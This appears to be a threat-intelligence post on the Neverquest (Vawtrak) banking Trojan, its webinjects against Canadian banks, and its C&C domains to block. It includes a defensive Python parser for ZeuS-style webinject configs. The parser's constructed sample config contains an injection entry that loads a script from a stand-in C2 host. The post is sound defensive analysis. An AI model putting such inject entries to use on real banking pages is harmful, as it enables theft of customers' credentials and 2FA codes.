Neverquest (aka Vawtrak) is a classic Trojan-banker with a variety of different advanced functions to attack online banking customers. The malware often gets installed through downloaders that are dropped using drive-by attacks.
Once Neverquest's main component is installed, it modifies system settings and enables additional functions, such as video and screenshot capture. At the same time, it establishes a reverse connection to a list of predefined C&C servers and enrolls the machine in the botnet under a unique bot ID. This allows the attacker to steal all passwords stored on the system and to update the component and its functions at any time.
The current webinject reveals that the primary target, at least of this campaign, is financial institutions in Canada: we count more than 15 unique targets there. The webinject closely follows the ZeuS template and is designed to alter the content of several specified target websites.
Even the most savvy users are unlikely to notice such changes, since they happen under the hood while the official site is displayed.
Webinjection allows the attackers to circumvent 2FA (two-factor authentication) and harvest additional user data. This, in combination with virtual network computing (VNC), defeats most online banking protections.
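As an added illustration of the ZeuS-style webinject format the post refers to (example code written for this page, not the campaign's config or the author's tooling), here is a small Python parser that pulls the target URL masks, HTML anchors and injected content out of such a config, the step an analyst takes to enumerate the institutions a sample targets. The config text, domains and flags below are constructed assumptions, not indicators from this campaign.

```python
import re
from dataclasses import dataclass
@dataclass
class WebInject:
    url_pattern: str   # set_url mask: '*' = any run of characters, '#' = one character
    flags: str         # set_url flags as in ZeuS configs (e.g. G = GET, P = POST, L = log only)
    data_before: str = ""
    data_inject: str = ""
    data_after: str = ""
def parse_webinjects(text: str) -> list:
    """Parse a ZeuS-style webinject config into WebInject entries."""
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        word = line.strip()
        if word.startswith("set_url "):            # new target entry
            parts = word.split(None, 2)
            current = WebInject(parts[1], parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif word in ("data_before", "data_inject", "data_after"):
            section, buf = word, []                # start collecting a section body
        elif word == "data_end" and current and section:
            setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return injects
def url_matches(pattern: str, url: str) -> bool:
    """Does a visited URL fall under a set_url mask?"""
    regex = "".join(".*" if c == "*" else "." if c == "#" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, url, re.IGNORECASE) is not None
def target_hosts(injects) -> set:
    """Host part of each mask, i.e. the institutions the config targets."""
    return {re.sub(r"^\w+://", "", i.url_pattern).split("/", 1)[0] for i in injects}
# Constructed sample config with hypothetical domains; not taken from the real campaign.
SAMPLE_CONFIG = """set_url https://*.example-bank.test/* GP
data_before
<form name="login"*>
data_end
data_inject
<script src="https://inject.example-c2.test/inj.js"></script>
data_end
set_url https://online.second-bank.test/login* GL
data_before
</head>
data_end
data_inject
<input type="hidden" name="otp2">
data_end
"""
```

Running target_hosts(parse_webinjects(SAMPLE_CONFIG)) on a real config yields the list of targeted institutions, and url_matches lets you test whether a given login URL would trigger an injection.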
The C&C servers, which should be blocked or preferably nuked, are shown below:
horologecom.net
derjihuy.com
woevenglaref.ru
fywaskinsed.ru
zdravstvuyfm.com
nawerhuy.com
The domains resolve to several different IPs, which gives us the following geoIP heatmap.
We see a lot of overlapping hostile activity coming from these servers and IPs; our recommendation is to block all of them.
Sample hash: 8f6c511eb4210b5c8c5ee957e0e99a33